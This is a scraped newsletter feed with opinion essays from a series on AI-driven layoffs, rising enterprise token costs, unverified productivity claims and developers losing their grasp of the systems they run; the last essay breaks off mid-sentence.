pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div><hr></div><h4 style="text-align: center;">Part 6: <a href="/__u/forestmars.substack.com/i/199228915/everyone-has-the-wrong-impression">Everybody Has The Wrong Impression</a></h4><p style="text-align: center;"><em><strong>(NB. Part 6 will not be sent out, you&#8217;ll need to click above link)</strong></em></p><div><hr></div><p></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://ctolunchnyc.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Subscribe to CTO Lunch NYC</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p></p><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-1" href="#footnote-anchor-1" class="footnote-number" contenteditable="false" target="_self">1</a><div class="footnote-content"><p>Literally, <a href="http://antimemetics.blog/">Antimemetics</a>. </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-2" href="#footnote-anchor-2" class="footnote-number" contenteditable="false" target="_self">2</a><div class="footnote-content"><p>Negative contasts&#8212;like em dashes&#8212;should not be cravenly avoided and so ceded over to the LLM. Either should be used, where appropriate, not with shame, but with confidence. </p></div></div>]]></content:encoded></item><item><title><![CDATA[Doing Less With More ]]></title><description><![CDATA[Part 4 of Retcon Reckoning (The Great AI Replacement)]]></description><link>https://ctolunchnyc.substack.com/p/doing-less-with-more</link><guid isPermaLink="false">https://ctolunchnyc.substack.com/p/doing-less-with-more</guid><dc:creator><![CDATA[Forest Mars]]></dc:creator><pubDate>Mon, 01 Jun 2026 13:01:02 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!H-r7!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01a0fe8c-0768-4943-9b9f-9a63a6370844_1456x971.webp" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!H-r7!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01a0fe8c-0768-4943-9b9f-9a63a6370844_1456x971.webp" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!H-r7!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01a0fe8c-0768-4943-9b9f-9a63a6370844_1456x971.webp 424w, /__u/substackcdn.com/image/fetch/$s_!H-r7!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01a0fe8c-0768-4943-9b9f-9a63a6370844_1456x971.webp 848w, /__u/substackcdn.com/image/fetch/$s_!H-r7!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01a0fe8c-0768-4943-9b9f-9a63a6370844_1456x971.webp 1272w, /__u/substackcdn.com/image/fetch/$s_!H-r7!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01a0fe8c-0768-4943-9b9f-9a63a6370844_1456x971.webp 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!H-r7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01a0fe8c-0768-4943-9b9f-9a63a6370844_1456x971.webp" width="1456" height="971" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/01a0fe8c-0768-4943-9b9f-9a63a6370844_1456x971.webp&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:971,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:27292,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/webp&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/199279431?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01a0fe8c-0768-4943-9b9f-9a63a6370844_1456x971.webp&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!H-r7!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01a0fe8c-0768-4943-9b9f-9a63a6370844_1456x971.webp 424w, /__u/substackcdn.com/image/fetch/$s_!H-r7!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01a0fe8c-0768-4943-9b9f-9a63a6370844_1456x971.webp 848w, /__u/substackcdn.com/image/fetch/$s_!H-r7!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01a0fe8c-0768-4943-9b9f-9a63a6370844_1456x971.webp 1272w, /__u/substackcdn.com/image/fetch/$s_!H-r7!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01a0fe8c-0768-4943-9b9f-9a63a6370844_1456x971.webp 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">A system can appear balanced long after it stops being stable. </figcaption></figure></div><blockquote><p><em>The gap between what the invoice said and what the board slide promised was not, in the end, a measurement problem. It was the measurement itself. </em></p></blockquote><p>The corporate math was presented, in every instance, as self-evident. Headcount is a cost. AI reduces the need for headcount. Reducing headcount reduces cost. The freed cost funds AI investment. The AI investment further reduces headcount. The model is recursive. The flywheel spins. The slide is clean. The coffee is ok. </p><p>Gartner surveyed 350 large companies actively deploying AI, by any reasonable standard the organizations most positioned to be getting this right, and found that 80 percent had reduced their workforce as a &#8216;direct result&#8217; of their AI investments. The finding that followed belied what assumptions those announcements would have otherwise invited: the layoffs had zero statistical correlation with improved ROI. <strong>Companies that cut the most staff showed returns nearly identical to companies that cut the least.</strong></p><p>One mechanism the correlation data cannot explain is knowledge debt. Not the kind that appears on a balance sheet, bc it doesn&#8217;t appear anywhere a dashboard monitors or a quarterly review surfaces but is the accumulated understanding of a specific system, built by specific people over specific years of decisions that were made for reasons that made sense at the time and were never written down because the person who made them was always available to explain them, until they weren&#8217;t. The lag between cutting the humans and discovering what the humans were doing is long enough that the decision looks rational at execution. The first quarterly review looks fine. The second looks fine. The third surfaces something that cannot be explained without reference to a person who left eight months ago, and by then the documentation they were supposed to produce before leaving has been discovered to be incomplete in a particularly crucial way, bc the knowledge that matters most is hardest to articulate, which is why it was never articulated, and why it left with them. Which is why we aim organisationally to eliminate irreplaceability. </p><p>What the Gartner data also cannot capture is the response from the other side of the transaction. One study found that 29 percent of employees admit to actively sabotaging their company&#8217;s AI strategy, with the number climbing to 44 percent among GenZ, whose resistance is deliberate and tactical: feeding corrupted data into models, routing around corporate control planes with unauthorized tools, intentionally generating low-quality output to demonstrate system fragility, all while 60 percent of executives plan to lay off employees who won&#8217;t adopt AI, 77 percent will bar non-adopters from promotion, and 92 percent openly admit they are cultivating an AI elite. Leadership has spent two years insisting this is a productivity initiative. The workforce isn&#8217;t so sure, and neither is the data. </p><p>Moreover, the data does not and cannot capture what is happening to the work itself. The model does not argue when you accept its suggestion for another layer of indirection. It does not push back when the product requirement is vague and the prompt is lazier still. <strong>The model is the world&#8217;s most expensive yes-man, and organizations have discovered they like being told yes.</strong> The result is not acceleration toward excellence but acceleration toward sufficient because sufficient ships, sufficient meets the KPI, and sufficient can be presented to the board as evidence that the AI investment is bearing fruit, even as the long-term carrying cost of the sufficient codebase (quietly) metastasizes in production. </p><h3>First The Good News </h3><blockquote><p><em>Q1 2026 earnings calls established is that something is happening. <br>What they did not establish is what.</em></p></blockquote><p>Zuckerberg described engineers building in a week what once required dozens and months. IBM disclosed 45 percent productivity gains across its developer workforce and $4.5 billion in internal cost savings since 2023. These are quantitative claims in the technical sense, containing numbers, stated with executive confidence on a live call to institutional investors. They are not quantitative claims in the empirical sense, because none were independently verified, and because the people making them had a structurally motivated interest in demonstrating that the AI investment was generating returns.</p><p>But Meta did post the most lucrative opening quarter in its corporate history ($56.31 billion in revenue, $26.8 billion in net income) and three weeks later announced 8,000 layoffs. At the internal town hall, Zuckerberg was direct: getting everyone to use AI tools and doing the work more efficiently is not the thing that&#8217;s driving layoffs. The CEO who had just spent an earnings call crediting AI-enabled productivity gains, now telling his own employees that the productivity gains were not why anyone is losing their job. Cisco ran the same play this quarter. Cloudflare followed suit with an apologetic memo described as &#8220;the first true AI-layoff manifesto.&#8221;</p><p>So, AI is enabling companies to do more with less (according to the earnings calls) but also AI is not the reason for all the pink slips (according to the layoff announcements.) And then there&#8217;s the CEPR survey of 5,000 firms in the same period found that around 80 percent reported no AI-driven productivity gains at all. The Atlanta Fed found measurable gains concentrated in high-skilled tasks, with <em>perceived gains exceeding measured revenue gains</em>, a gap the researchers called the <strong>productivity paradox</strong>, which might less diplomatically be described as the distance between what gets said on earnings calls and what shows up in the books. McKinsey found only 39 percent of companies reporting any current EBIT impact from AI. But 39 percent is not nothing. </p><p>The actual data resolves into a measurement fog dense enough that the same quarter can produce IBM&#8217;s $4.5 billion in savings and a survey of 5,000 firms reporting nothing measureable. Both can be accurate while neither indicate what is actually happening, because the proxies measure things adjacent to the outcome rather than the outcome itself ; the metric has decoupled from what it was introduced to track, and the decoupling is invisible from inside the metric. When Uber rolled out Claude Code to its 5,000-person engineering organization in December 2025 and by March had 84 percent of engineers using it (with 70 percent of all committed code originating from AI, the highest publicly reported ratio at any major technology company) it announced it had AI opening 11% of new pull requests, which reveals precisely what percentage of committed code came from AI and nothing whatsoever about whether that code was worth what it cost to produce.</p><p>CTOs built internal dashboards ranking engineers by AI consumption, which functionally made them cost-acceleration mechanisms. Like Amazon, who in the same period it was announcing 16,000 layoffs, launched a token consumption rankings page, Meta called theirs &#8220;Claudeonomics&#8221; and handed out badges like &#8220;Token Legend&#8221; and &#8220;Session Immortal&#8221; &#8212; <strong>the<a href="/__u/ctolunchnyc.substack.com/i/199271867/is-your-ai-policy-breeding-cobras"> cobra farm</a> stated as corporate policy, formalized into vocabulary, and gamified into a leaderboard</strong>. Uber also built internal dashboards ranking engineers by AI consumption and found their top engineers were burning between $500 and $2,000 each per month. <strong>Uber&#8217;s full-year AI budget was exhausted by April.</strong> Microsoft, after a quarter of telling investors that Lloyds Bank was saving each employee 46 minutes per day, quietly canceled most of its internal Claude Code licenses in May 2026, effective June 30, directing its own engineers to its own cheaper tool. And Bryan Catanzaro, Nvidia&#8217;s own VP of Applied Deep Learning, told Axios that for his team, the cost of compute had already exceeded the cost of employees. Taken together, these findings that explain why the earnings call slides require such careful construction.</p><div class="callout-block" data-callout="true"><p>The retcon goes: layoffs are transformation, headcount reductions are investments, undemonstrated gains are early signals, companies without ROI are simply early on the curve, and the curve bends upward: number go up. </p></div><p><strong>Because large language models remain structurally prone to hallucination</strong> and architectural regression, cutting the human layer doesn&#8217;t eliminate the labor cost, it forces the enterprise to pay twice and both bills are on the OpEx side. Once for the token bills of the autonomous agents, and again for the specialized engineers whose job is to untangle what the agents produced. Salesforce will spend nearly $300 million on Anthropic tokens this fiscal year, against a global engineering payroll of roughly $5 billion for 15,000 engineers. That the token bill is no longer a rounding error in an R&amp;D budget but a massive, recurring, variable operating cost that scales with every line of automated output does not make the financial decision any less rational or the amount any less commensurate, and it also does not replace the humans required to verify that output. It joins them on the invoice, at a rate that makes the original headcount reduction look, in retrospect, like a discount. Which it kind of was. </p><p>The Gartner data on who succeeds points elsewhere. The companies doing best are not the ones that replaced humans with AI or maxed out their token spends. They invested in people alongside it, building systems where humans supervise and extend what AI produces (which is not to imply Benioff isn&#8217;t doing that, I don&#8217;t have that insider info.) It&#8217;s a narrative that&#8217;s easy to nod along to and not so easy to put into practice. And even when it is put into practice, the bill has a way of coming due anyway, as we&#8217;re seeing with current obsession over the token cost reduction. </p><div class="callout-block" data-callout="true"><h3 style="text-align: center;">The &#8220;TIP&#8221; (Token Improvement Plan)</h3><p style="text-align: justify;">It starts as a dark joke inside engineering Slack channels, usually right after an unhandled recursive test loop burns through five figures in API calls over a long weekend: <em>&#8220;Management is putting you on a TIP&#8212;a Token Improvement Plan.&#8221;</em></p><p style="text-align: justify;"><strong>But as the inverse economics of the frontier solidify, the reporting layer is already building the infrastructure to make it real.</strong></p><p style="text-align: justify;">The conversation happens behind a closed glass door, guided by a Director of Engineering staring at a Datadog billing visualization:</p><blockquote><p><em>&#8220;Your velocity is fine, but your token consumption exceeds twice your base salary. You&#8217;re appending a 100k-token repository to every prompt just to fix minor layout bugs. We need you to drop your marginal token spend by 45% over the next thirty days, or we&#8217;re going to have to route your IDE access through a smaller, open-source model running locally on an older Mac Studio.&#8221;</em></p></blockquote><p>This is the ultimate loop of the &#8220;Doing Less with More&#8221; doctrine. The enterprise pink slips 15% of the human staff to fund the autonomous transition, only to discover that the remaining humans consume tokens like a runaway process, like a horse fitted with a jetpack (which is obviously cool.)</p></div><p><strong>Doing more with less was the promise. Doing less with more is the condition</strong>: less verifiable return, more spend; less human understanding of the systems humans are nominally managing, more dashboards measuring the proxies that replaced that understanding; less signal, more noise; less stability, more recovery. Goldman Sachs forecasts a 24-fold increase in enterprise token consumption by 2030. (Let that sink in.) Gartner projects that even as individual token prices fall 90 percent, total enterprise AI costs will increase, because agents consume tokens at rates that make price-per-token beside the point. (<a href="/__u/ctolunchnyc.substack.com/p/cto-lunch-nyc-spring-2026#:~:text=Opus%204.7%20arrived%20with%20a%20near%2Dquadrupling%20of%20token%20usage%20on%20identical%20prompts">Opus 4.7 consumes 4&#215; as many tokens</a> for the exact same prompts.) The math does not improve at scale; it compounds. The invoice arrives later and larger, and the people who receive it are not, in many cases, the people who signed the contract.</p><p>The story currently circulating is as clean as retcons get: AI is working, the adoption curve is healthy, the returns are coming, the companies that cut too deep are simply early, and the capital is flowing in the right direction. <strong>What capital is actually building is a different question.</strong> And unlike the productivity claims, unlike the 46 minutes saved at Lloyds and the 45 percent gains at IBM and the budgets blown away by April, and the dashboards and the tokenmaxing and the shadow IT cobras running under everyone&#8217;s desk; the answer is not a matter of measurement lag or methodology. </p><div><hr></div><h4 style="text-align: center;">Part 5: <a href="/__u/ctolunchnyc.substack.com/p/spending-other-peoples-money">Spending Other People&#8217;s Money </a></h4><div><hr></div><p></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://ctolunchnyc.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Subscribe to CTO Lunch NYC</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p></p>]]></content:encoded></item><item><title><![CDATA[Developers Developers Developers Developers]]></title><description><![CDATA[Part 3 of Retcon Reckoning (The Great AI Replacement)]]></description><link>https://ctolunchnyc.substack.com/p/developers-developers-developers</link><guid isPermaLink="false">https://ctolunchnyc.substack.com/p/developers-developers-developers</guid><dc:creator><![CDATA[Forest Mars]]></dc:creator><pubDate>Thu, 28 May 2026 11:59:37 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!OTbG!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9c697b24-1dd9-463e-bfee-26daa36435bd_900x675.webp" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!OTbG!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9c697b24-1dd9-463e-bfee-26daa36435bd_900x675.webp" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!OTbG!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9c697b24-1dd9-463e-bfee-26daa36435bd_900x675.webp 424w, /__u/substackcdn.com/image/fetch/$s_!OTbG!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9c697b24-1dd9-463e-bfee-26daa36435bd_900x675.webp 848w, /__u/substackcdn.com/image/fetch/$s_!OTbG!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9c697b24-1dd9-463e-bfee-26daa36435bd_900x675.webp 1272w, /__u/substackcdn.com/image/fetch/$s_!OTbG!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9c697b24-1dd9-463e-bfee-26daa36435bd_900x675.webp 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!OTbG!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9c697b24-1dd9-463e-bfee-26daa36435bd_900x675.webp" width="900" height="675" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/9c697b24-1dd9-463e-bfee-26daa36435bd_900x675.webp&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:675,&quot;width&quot;:900,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:36608,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/webp&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/199276711?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9c697b24-1dd9-463e-bfee-26daa36435bd_900x675.webp&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="/__u/substackcdn.com/image/fetch/$s_!OTbG!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9c697b24-1dd9-463e-bfee-26daa36435bd_900x675.webp 424w, /__u/substackcdn.com/image/fetch/$s_!OTbG!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9c697b24-1dd9-463e-bfee-26daa36435bd_900x675.webp 848w, /__u/substackcdn.com/image/fetch/$s_!OTbG!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9c697b24-1dd9-463e-bfee-26daa36435bd_900x675.webp 1272w, /__u/substackcdn.com/image/fetch/$s_!OTbG!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9c697b24-1dd9-463e-bfee-26daa36435bd_900x675.webp 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><blockquote><p><em>Software has gotten easier to write, but harder to understand.</em> </p></blockquote><p><strong>There can be no doubt that the office chair has become more comfortable.</strong> Still eons behind gamer chairs, tho we&#8217;re starting to see more of those at startups. And there can be little doubt that during the same period software has gotten easier to write. What was once a an exercise in muscle memory and meticulous attention to syntactic details had come to be turbo autocomplete where <code>tab</code> becomes the most used key on your keyboard, which from a muscle memory point of view is an unambiguous victory, in the same way that not having to remember phone numbers is an unambiguous victory, and which carries, in both cases, the same quiet implication that you would be in very much over your head if the situation ever arose where you needed to remember one. </p><p>Regarding what is actually happening no one as yet has a coherent thesis supported by evidence, so everyone constructs one in real time, as the epistemically appropriate response to a situation in which the signal is genuinely contradictory and the stakes are high enough that silence has acquired the specific social weight of holding an <a href="http://antimemetics.blog/about">antimemetic</a> opinion, an admission the modern online economy has yet to find a way to prosecute but is working on it. So the thought pieces proliferate. The frameworks multiply. The conference panels convene. And over all of it hangs the industry&#8217;s dominant retcon: developers weren&#8217;t being replaced, they&#8217;re being given an opportunity to move up the stack. Being given a better chair, even. </p><p>The argument has genuine historical backing. From assembly to C, from C to Python, from on-prem to cloud, from manual memory management to garbage collection, every major transition involved movement to a higher level of abstraction, and in each case the practitioners who adapted found themselves working at a level that was more powerful, if less granular. The stack got taller. (<em>bigger, and more angular</em>) The abstraction was genuinely upward: you retained what you knew and gained a higher vantage. The retcon frames the current moment as the latest iteration of this pattern, which would be a reasonable frame if the pattern were actually repeating, which it is not, certainly not in the way that matters.</p><p>The distinction the retcon requires you not to make involves the difference between a higher level of abstraction and a higher level of ambiguity. When a C++ developer moved to Python, they did not report brain fog. (They did report other kinds of trauma, but that&#8217;s a story for another day.) When a sysadmin moved to AWS, they did not feel their understanding of networking precariously dissolve. Previous transitions preserved the knowledge of the layer below, automating interaction with that layer without making the layer inaccessible, which is why the developer who moved from C to Python could still reason about memory management when something went wrong at the boundary. The abstraction was upward. What gets reported now differs in kind: engineers losing the ability to hold a codebase in their heads, losing the capacity to reason about the system they are nominally responsible for, losing the thread of what the code is actually doing underneath the layer the agent is operating on.</p><p>Brain fog, like Gibson&#8217;s famous future, is not evenly distributed. The engineers who report the most acute version of it are not, by and large, the ones who understood the stack most deeply. They are the ones for whom the agentic tools arrived before the underlying knowledge had fully formed, for whom coding had been something the tooling managed, the syntax something the autocomplete supplied, the architecture something the framework handled, and who were, for a remarkable stretch of time, compensated extraordinarily well for their fluency with the interfaces rather than their understanding of what the interfaces were built on. An entire generation for whom software development was, at some meaningful level, a video game that paid exceptionally well and which the agentic tools have now revealed to have been, in part, a video game being played on someone else&#8217;s hardware.</p><div class="pullquote"><p>Substitution and augmentation are not the same operation, and the difference <br>shows up in what the person retains when the tool is taken away.</p></div><p>The retcon interprets this as the temporary disorientation of transition, the expected friction of moving to a new level of abstraction, something that will resolve once the new paradigm is fully internalized. The more accurate interpretation is that it is the perception of a capability being abandoned rather than relocated; not moved up the stack but left behind in it, inaccessible not because it has been abstracted but because the tools that were supposed to augment it are instead substituting for it, and substitution and augmentation are not the same operation, and the difference between 